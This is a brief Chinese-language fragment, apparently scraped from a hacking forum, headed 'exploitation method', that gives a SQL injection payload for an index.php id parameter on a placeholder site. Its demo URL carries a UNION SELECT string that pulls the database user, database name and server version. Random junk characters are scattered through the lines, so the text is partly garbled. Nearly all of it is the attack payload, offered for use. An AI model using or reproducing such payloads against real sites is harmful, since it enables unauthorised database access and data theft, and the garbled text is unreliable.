利用方法:
! C6 U0 ~2 G- f$ r http://www.xxx.com/index.php?id=[SQL]* s# H# [6 c1 w# W& ]( x$ F2 N
Demo:% L" P8 P7 X& |0 l$ Q
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |